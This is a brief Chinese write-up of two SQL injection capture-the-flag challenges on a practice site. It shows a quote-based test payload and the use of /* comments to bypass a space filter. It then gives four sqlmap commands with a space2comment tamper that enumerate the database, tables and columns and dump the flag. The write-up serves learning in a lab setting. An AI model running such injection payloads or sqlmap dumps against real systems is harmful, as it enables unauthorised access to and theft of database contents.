目前只会做1和2。。3的话网上查了wp不知道他们sqlmap没防任何过滤咱们跑出来的。。。等来年长了本事了,一定要自己手工做出来
注入1的话呢,在输入1’ or ‘1’=’1的时候就发现存在过滤,后来发现是空格被过滤了,所以我们用注释符/*来替换空格,注入1的话就这一个点,我就贴原来的笔记上来了
接下来我们我们看看注入2
这题手工注入的话,其实和上一题没多大区别,也算把空格替换成注释符就行,不过因为order by只有1的的时候才有效,所以这次union select 后面接一个就行了
下面用sqlmap进行注入
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –dbs
查库名
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –tables -D web1
查表名
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –columns -T flag -D web1
查列名
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –dump -C flag -T flag -D web1
查列表内容
